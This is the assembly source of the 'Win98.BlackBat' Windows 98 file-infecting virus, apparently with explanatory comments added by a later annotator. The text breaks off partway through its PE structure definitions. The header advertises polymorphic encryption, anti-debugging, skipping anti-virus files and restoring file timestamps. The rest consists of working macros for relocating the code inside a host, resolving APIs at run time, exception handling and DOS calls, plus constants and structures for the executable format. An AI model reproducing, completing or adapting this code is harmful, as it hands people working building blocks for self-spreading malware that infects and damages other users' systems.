;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | \|/ Win98.BlackBat \|/ | |
;| | (. .) ================ (. .) | |
;| | ( | ) ( | ) | |
;| | ( v ) (c) 1999, Rohitab Batra ( v ) | |
;| | __| |__ < e-mail address withheld > __| |__ | |
;| | // \\ ICQ: 11153794 // \\ | |
;| | // ^ ^ \\ | |
;| | ((====> http://www.rohitab.com <=====)) | |
;| | | |
;| |"Blessed is he who expects nothing, for he shall not be disappointed" | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
;
;
;Linking (Turbo Linker)
; c:\>tlink32 /x /Tpe /aa /c BlackBat,BlackBat,,IMPORT32.LIB
;
;Making Code Section Writable (EditBin from SDK, or any other utility)
; c:\>editbin /SECTION:CODE,w BlackBat.EXE
;
;***** Info About the Virus *****
;* If WIN.SYS is found in the root directory, the virus does not infect any file,
; and does not become resident.
;* File time and attributes are restored after infection
;* Encrypted with a random key
;* Doesn't infect anti-virus files, NAV, TBAV, SCAN, CLEAN, F-PROT
;* Anti-Debugging Code
;* Structured Exception Handling
;* Decryption engine is Polymorphic
;
;***** TODO *****
;1. Don't infect files with today's date
;2. Draw Random Bats on the Screen (Use CreateCompatibleBitmap & Get/Set Pixel)
;3. Doesn't infect files in directories with long file names
.386p ;386 instruction set incl. privileged instructions
.model flat ,stdcall ;32-bit flat model; stdcall also makes TASM's extended
;"call target, arg1, arg2" syntax push args right-to-left
;(relied on by @GET_API_ADDRESS / @CALL_INT21h below)
EXTRN ExitProcess:PROC ;Any Imported Fn, so that the first
;generation copy executes without crashing
;(gives the first-generation EXE an import table; the virus
; body itself resolves every API it uses at run time)
.data
DB ? ;Required for TASM, Else will Crash !!??
;(one byte so the .data section is not empty; the exact
; reason TASM/TLINK need it is not explained here)
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @MESSAGE_BOX Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Displays a MessageBox with the given Message. Note the caption of
; the MessageBox is the same as the Message
;
; Arguments
; -> szMessage: Message to be displayed
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> ALL
;___________________________
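@MESSAGE_BOX MACRO szMessage
;; Debug-only helper: expands to nothing unless the DEBUG symbol is defined
;; (its definition is not in this listing; it must come earlier or from the
;; assembler command line). szMessage is addressed through the delta offset
;; because the body may be running relocated inside a host.
;; Clobbers ESI (delta) and whatever MessageBoxA clobbers (EAX, ECX, EDX).
IF DEBUG
@DELTA esi ;;ESI = delta offset
mov eax, esi
add eax, offset szMessage ;;EAX = relocated address of szMessage
;;MessageBoxA(NULL, text, caption = text, MB_OK | MB_ICONINFORMATION),
;;called indirectly through the API slot filled in by @GET_API_ADDRESS
call esi + MessageBoxA, 0, eax, eax, MB_OK OR MB_ICONINFORMATION
ENDIF
ENDM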
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @DEFINE_API Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Defines an API that will be called by the Virus. The macro is expanded
; to the following, if APIName is MessageBoxA:
; szMessageBoxA DB "MessageBoxA", 0
; MessageBoxA DD ?
;
; Arguments
; -> APIName: API to be defined. MUST BE EXACTLY the same as exported by
; the DLL. e.g. MessageBoxA
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> None
;
;________________________
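@DEFINE_API MACRO APIName
;; Declares one run-time-resolved import: the ASCIIZ export name that is
;; handed to GetProcAddress, immediately followed by a DD slot that
;; @GET_API_ADDRESS fills with the resolved address and that callers use as
;; "call esi + APIName". The slot is emitted wherever the macro is expanded;
;; if that is the code section, the section must be writable for the store
;; to succeed (cf. the editbin step in the file header).
sz&APIName DB "&APIName", 0 ;;ASCIIZ Name of API
&APIName DD ? ;;Storage space for API Address
ENDM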
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @DELTA Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Returns the delta offset in the specified register
;
; Arguments
; -> Register: register in which the value of the delta offset is copied
;
; Return Value:
; -> Register: Delta Offset
;
; Registers Destroyed
; -> Register
;
;____________________
@DELTA MACRO Register
;; Delta = (run-time address of GetIP) - (link-time "offset GetIP").
;; It is zero while the code runs at its linked address and becomes the
;; relocation displacement once the body has been copied elsewhere (e.g.
;; appended to a host); add it to any link-time "offset X" to reach the
;; relocated X. Only Register and the flags (from SUB) are changed; the
;; CALL/POP pair leaves the stack balanced.
LOCAL GetIP
call GetIP ;;This will push EIP on the stack
GetIP:
pop Register ;;get EIP of current instruction
sub Register, offset GetIP ;;Delta Offset
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @OFFSET Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Returns the true offset of the specified address. Unlike the offset
; keyword, which calculates the address at assembly time, this macro
; calculates the address at run-time. This is used to get the correct
; offset when the virus has been relocated. Instead of using instructions
; like "mov esi, offset szFilename", use "@OFFSET esi, szFilename"
;
; Arguments
; -> Register: register in which the offset is to be returned
; -> Expression: expression whose offset is required
;
; Return Value:
; -> Register: Correct offset of Expression
;
; Registers Destroyed
; -> Register
;
;_________________________________
@OFFSET MACRO Register, Expression
;; Register = run-time address of Expression, computed as
;; EIP(GetIP) + (offset Expression - offset GetIP). The parenthesised
;; difference is a link-time constant, so unlike "@DELTA + add" no second
;; register is needed and the delta is never materialised.
;; Only Register and the flags (from ADD) are changed.
LOCAL GetIP
call GetIP ;;This will push EIP on the stack
GetIP:
pop Register ;;get EIP of current instruction
add Register, offset Expression - offset GetIP ;;True offset
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @GET_API_ADDRESS Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Gets the address of the API, and stores it
;
; Arguments
; -> APIName: API whose address is required
; -> ESI: Delta Offset
; -> EBX: Address of GetProcAddress(...)
; -> ECX: Base address of DLL which exports the API
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> All Except ESI, EBX and ECX
;
;_____________________________
@GET_API_ADDRESS MACRO APIName
;; Resolves one import declared with @DEFINE_API:
;;   [esi + APIName] = GetProcAddress(ECX, esi + sz&APIName)
;; TASM's extended CALL pushes EAX then ECX (right-to-left) and calls EBX.
;; NOTE(review): the return value is stored unchecked, so an export that is
;; missing on the running system leaves 0 in the slot and a later
;; "call esi + APIName" will fault (presumably caught by the SEH macros).
push ebx ;;Save Addr of GetProcAddress(...)
push ecx ;;Save Image Base
mov eax, esi
add eax, offset sz&APIName ;;API whose address is required (relocated)
call ebx, ecx, eax ;;GetProcAddress(...)
pop ecx ;;Restore Image Base
pop ebx ;;Restore Addr of GetProcAddress(...)
mov [esi + APIName], eax ;;Save API Address (slot must be writable)
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @TRY_BEGIN, @TRY_EXCEPT and @TRY_END Exception Handling Macros | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> @TRY_BEGIN: This macro is used to install the exception handler. The
; code that follows this is the one that is checked for
; exceptions
; @TRY_EXCEPT: The code that follows this is executed if an exception
; occurs.
; @TRY_END: This is used to mark the end of the TRY block
;
; Example
; @TRY_BEGIN ZeroMemory
; <CODE1: Code to check for exceptions goes here>
; @TRY_EXCEPT ZeroMemory
; <CODE2: Gets executed if an exception occurs in CODE1>
; @TRY_END ZeroMemory
;
; Arguments
; -> Handler: Name of the exception handler. MUST BE UNIQUE throughout the
; program
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> ESI: @TRY_BEGIN loads the handler address into ESI (via @OFFSET), so on
; the no-exception path ESI is clobbered and every other register is left
; as the protected code set it. If an exception occurs, all registers
; (including ESI) are restored to their state before @TRY_BEGIN.
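;_______________________
@TRY_BEGIN MACRO Handler
;; Pushes an EXCEPTION_REGISTRATION record {Next = old fs:[0], Handler}
;; on the stack and makes it the head of the SEH chain. Register state is
;; saved with PUSHAD first so @TRY_EXCEPT can restore it with POPAD.
;; Stack after expansion (low to high): old fs:[0], handler addr, 32 bytes
;; of PUSHAD, caller's frame. ESI is clobbered (handler address).
;; NOTE(review): the handler lives inside the (relocated, writable) virus
;; body; this only works on loaders without SafeSEH-style handler
;; validation, i.e. the Win9x target stated in the file header.
pushad ;;Save Current State (32 bytes)
@OFFSET esi, Handler ;;Address of New Exception Handler (run-time address)
push esi ;;EXCEPTION_REGISTRATION.Handler
push dword ptr fs:[0] ;;Save Old Exception Handler (EXCEPTION_REGISTRATION.Next)
mov dword ptr fs:[0], esp ;;Install New Handler; ESP is now the establisher frame
ENDM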
@TRY_EXCEPT MACRO Handler
;; Marks the end of the protected code and the start of the except-block.
;; Falling into it from the protected code jumps over the handler; the
;; label Handler is what the OS dispatcher calls on a fault, as
;; Handler(ExceptionRecord, EstablisherFrame, Context, DispatcherContext).
;; The handler never returns to the dispatcher: it resets ESP to the
;; establisher frame (the fs:[0] record pushed by @TRY_BEGIN), unlinks
;; that record, restores the saved registers and simply falls through into
;; the except-block. Nothing below the establisher frame is unwound, it is
;; just abandoned together with the faulting stack.
jmp NoException&Handler ;;No Exception Occured, so jump over
Handler:
mov esp, [esp + 8] ;;Exception Occured, Get old ESP ([esp+8] = EstablisherFrame = ESP at install time)
pop dword ptr fs:[0] ;;Restore Old Exception Handler (unlink our record)
add esp, 4 ;;ESP value before SEH was set (discard the pushed handler address)
popad ;;Restore Old State (all registers as before @TRY_BEGIN)
ENDM
@TRY_END MACRO Handler
;; Closes the block. Reached from the except-block (exception already
;; handled, stack already cleaned by @TRY_EXCEPT) or from the protected
;; code via NoException&Handler, where the record and the PUSHAD image are
;; still on the stack: unlink the record and drop 4 + 32 bytes without
;; restoring registers, so the protected code's register results survive.
jmp ExceptionHandled&Handler ;;Exception was handled by @TRY_EXCEPT
NoException&Handler: ;;No Exception Occured
pop dword ptr fs:[0] ;;Restore Old Exception Handler
add esp, 32 + 4 ;;ESP value before SEH was set. 32 for pushad and ...
;;...4 for push offset Handler. (No Restore State)
ExceptionHandled&Handler: ;;Exception has been handled, or no exception occured
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @CALL_INT21h Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Makes an INT 21h Call in Protected Mode
;
; Arguments
; -> Service: INT 21h Service Number
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> ESI (delta offset) and EAX (service number) always; the rest depends
; on the Service called
;_________________________
@CALL_INT21h MACRO Service
;; Issues a DOS INT 21h request from ring-3 Win32 code by going through the
;; VWIN32 VxD: VxDCall(VWIN32_Int21Dispatch, EAX = Service, ECX) with the
;; arguments pushed right-to-left by TASM's extended CALL. VxDCall is an
;; API slot resolved elsewhere (its @DEFINE_API is outside this excerpt);
;; the call goes indirectly through [esi + VxDCall]. ECX is passed through
;; from the caller untouched. ESI is clobbered by @DELTA.
mov eax, Service ;;INT 21h Service
@DELTA esi ;;ESI = delta offset (does not touch EAX)
call esi + VxDCall, VWIN32_Int21Dispatch, eax, ecx
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | Constants | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
;Win32 Constants
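PAGE_READWRITE EQU 00000004h ;Page protection for VirtualAlloc/CreateFileMapping
IMAGE_READ_WRITE_EXECUTE EQU 0E0000000h ;Section flags: MEM_EXECUTE|MEM_READ|MEM_WRITE
IMAGE_SCN_MEM_SHARED EQU 10000000h ;Section is Sharable
IMAGE_FILE_DLL EQU 2000h ;File is a DLL (bit in IFH_Characteristics)
FILE_MAP_ALL_ACCESS EQU 000F001Fh ;MapViewOfFile access
IMAGE_SIZEOF_NT_SIGNATURE EQU 04h ;PE00 = 0x00004550, 4 bytes
NULL EQU 0
TRUE EQU 1
FALSE EQU 0
;File Access (CreateFile dwDesiredAccess / dwShareMode / dwCreationDisposition)
GENERIC_READ EQU 80000000h ;Access Mode Read Only
GENERIC_WRITE EQU 40000000h ;Access Mode Write Only
FILE_SHARE_READ EQU 00000001h ;Other opens may read (on its own: writes denied)
FILE_SHARE_WRITE EQU 00000002h ;Other opens may write (on its own: reads denied)
INVALID_HANDLE_VALUE EQU -1
ERROR_ALREADY_EXISTS EQU 000000B7h ;GetLastError after CreateFileMapping/CreateMutex on an existing object
FILE_ATTRIBUTE_NORMAL EQU 00000080h
OPEN_EXISTING EQU 3 ;Fail if not found
;Shutdown Options (ExitWindowsEx uFlags)
EWX_FORCE EQU 4 ;Do not wait for applications to close
EWX_SHUTDOWN EQU 1
;MessageBox
MB_OK EQU 00000000h
MB_YESNO EQU 00000004h
MB_ICONINFORMATION EQU 00000040h
;Virus_Constants
@BREAK EQU int 3 ;Text equate: expands to a debugger breakpoint
;MAX_RUN_TIME EQU 5*60*60*1000 ;Time we allow windows to run, 5hrs
VIRUS_SIGNATURE EQU 08121975h ;My B'day, 8 Dec 1975 (presumably the infection marker; use is outside this excerpt)
RESIDENCY_CHECK_SERVICE EQU 0AD75h ;Used to check if Virus is resident
RESIDENCY_SUCCESS EQU 0812h ;Value returned if Virus is resident
;VxD Stuff (VxD service numbers are device ID in the high word, service in the low word)
VWIN32_Int21Dispatch EQU 002A0010h ;VWIN32 service used by @CALL_INT21h
LFN_OPEN_FILE_EXTENDED EQU 716Ch ;INT 21h long-file-name extended open/create
PC_WRITEABLE EQU 00020000h ;_PageReserve/_PageCommit flags
PC_USER EQU 00040000h
PR_SHARED EQU 80060000h
PC_PRESENT EQU 80000000h
PC_FIXED EQU 00000008h
PD_ZEROINIT EQU 00000001h
SHARED_MEMORY EQU 80000000h ;Anything above this is shared
PageReserve EQU 00010000h ;VMM services (_PageReserve, _PageCommit)
PageCommit EQU 00010001h
PAGE_SIZE EQU 4096 ;Size of a Page in Win9x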
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | Structures | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
FILETIME STRUC ;Win32 64-bit file time, as used by Get/SetFileTime
FT_dwLowDateTime DD ? ;Low 32 bits
FT_dwHighDateTime DD ? ;High 32 bits
FILETIME ENDS
IMAGE_DOS_HEADER STRUC ;DOS .EXE header (64 bytes; precedes every PE image)
IDH_e_magic DW ? ;Magic number ("MZ" = 5A4Dh)
IDH_e_cblp DW ? ;Bytes on last page of file
IDH_e_cp DW ? ;Pages in file
IDH_e_crlc DW ? ;Relocations
IDH_e_cparhdr DW ? ;Size of header in paragraphs
IDH_e_minalloc DW ? ;Minimum extra paragraphs needed
IDH_e_maxalloc DW ? ;Maximum extra paragraphs needed
IDH_e_ss DW ? ;Initial (relative) SS value
IDH_e_sp DW ? ;Initial SP value
IDH_e_csum DW ? ;Checksum
IDH_e_ip DW ? ;Initial IP value
IDH_e_cs DW ? ;Initial (relative) CS value
IDH_e_lfarlc DW ? ;File address of relocation table
IDH_e_ovno DW ? ;Overlay number
IDH_e_res DW 4 DUP (?) ;Reserved words
IDH_e_oemid DW ? ;OEM identifier (for IDH_e_oeminfo)
IDH_e_oeminfo DW ? ;OEM information; IDH_e_oemid specific
IDH_e_res2 DW 10 DUP (?) ;Reserved words
IDH_e_lfanew DD ? ;File address of new exe header (offset 3Ch: where the "PE\0\0" signature is found)
IMAGE_DOS_HEADER ENDS
IMAGE_FILE_HEADER STRUC ;COFF file header (20 bytes), follows the "PE\0\0" signature
IFH_Machine DW ? ;System that the binary is intended to run on
IFH_NumberOfSections DW ? ;Number of sections that follow headers
IFH_TimeDateStamp DD ? ;Time/Date the file was created on
IFH_PointerToSymbolTable DD ? ;Used for debugging information
IFH_NumberOfSymbols DD ? ;Used for debugging information
IFH_SizeOfOptionalHeader DW ? ;sizof(IMAGE_OPTIONAL_HEADER)
IFH_Characteristics DW ? ;Flags used mostly for libraries (IMAGE_FILE_DLL lives here)
IMAGE_FILE_HEADER ENDS
IMAGE_DATA_DIRECTORY STRUC ;One entry of the optional header's DataDirectory table
IDD_VirtualAddress DD ? ;RVA of the table (export, import, ...)
IDD_Size DD ? ;Size of the table in bytes
IMAGE_DATA_DIRECTORY ENDS
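IMAGE_OPTIONAL_HEADER STRUC ;PE32 optional header (224 bytes incl. 16 data directories)
;Standard Fields
IOH_Magic DW ? ;010Bh for PE32 (020Bh marks a PE32+ image, which has a different layout)
IOH_MajorLinkerVersion DB ? ;Version of the linker used
IOH_MinorLinkerVersion DB ? ;Version of the linker used
IOH_SizeOfCode DD ? ;Size of executable code
IOH_SizeOfInitializedData DD ? ;Size of Data Segment
IOH_SizeOfUninitializedData DD ? ;Size of bss Segment
IOH_AddressOfEntryPoint DD ? ;RVA of code entry point
IOH_BaseOfCode DD ? ;Offset to executable code
IOH_BaseOfData DD ? ;Offset to initialized data
;NT Additional Fields
IOH_ImageBase DD ? ;Preferred load address
IOH_SectionAlignment DD ? ;Alignment of Sections in RAM
IOH_FileAlignment DD ? ;Alignment of Sections in File
IOH_MajorOperatingSystemVersion DW ? ;OS Version required to run this image
IOH_MinorOperatingSystemVersion DW ? ;OS Version required to run this image
IOH_MajorImageVersion DW ? ;User specified version number
IOH_MinorImageVersion DW ? ;User specified version number
IOH_MajorSubsystemVersion DW ? ;Expected Subsystem version
IOH_MinorSubsystemVersion DW ? ;Expected Subsystem version
IOH_Win32VersionValue DD ? ;Mostly set to 0
IOH_SizeOfImage DD ? ;Amount of memory the image will need (multiple of SectionAlignment)
IOH_SizeOfHeaders DD ? ;Size of DOS hdr, PE hdr and Object table
IOH_CheckSum DD ? ;Checksum (Used by NT to check drivers)
IOH_Subsystem DW ? ;Subsystem required to run this image
IOH_DllCharacteristics DW ? ;To decide when to call DLL's entry point
IOH_SizeOfStackReserve DD ? ;Size of Reserved Stack
IOH_SizeOfStackCommit DD ? ;Size of initially commited stack
IOH_SizeOfHeapReserve DD ? ;Size of local heap to reserve
IOH_SizeOfHeapCommit DD ? ;Amount to commit in local heap
IOH_LoaderFlags DD ? ;Not generally used
IOH_NumberOfRvaAndSizes DD ? ;Number of valid entries in DataDirectory
IOH_DataDirectory IMAGE_DATA_DIRECTORY 16 DUP (?) ;Export = entry 0, Import = entry 1, ...
IMAGE_OPTIONAL_HEADER ENDS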
IMAGE_EXPORT_DIRECTORY STRUC
IED_Characteristics DD ? ;Currently set to 0
IED_TimeDateStamp DD ? ;Time/Date the export data was created
IED_MajorVersion DW ? ;User settable
IED_MinorVersion DW ?
IED_Name DD ? ;RVA of DLL ASCIIZ name
IED_Base DD ? ;First valid exported ordinal
IED_NumberOfFu




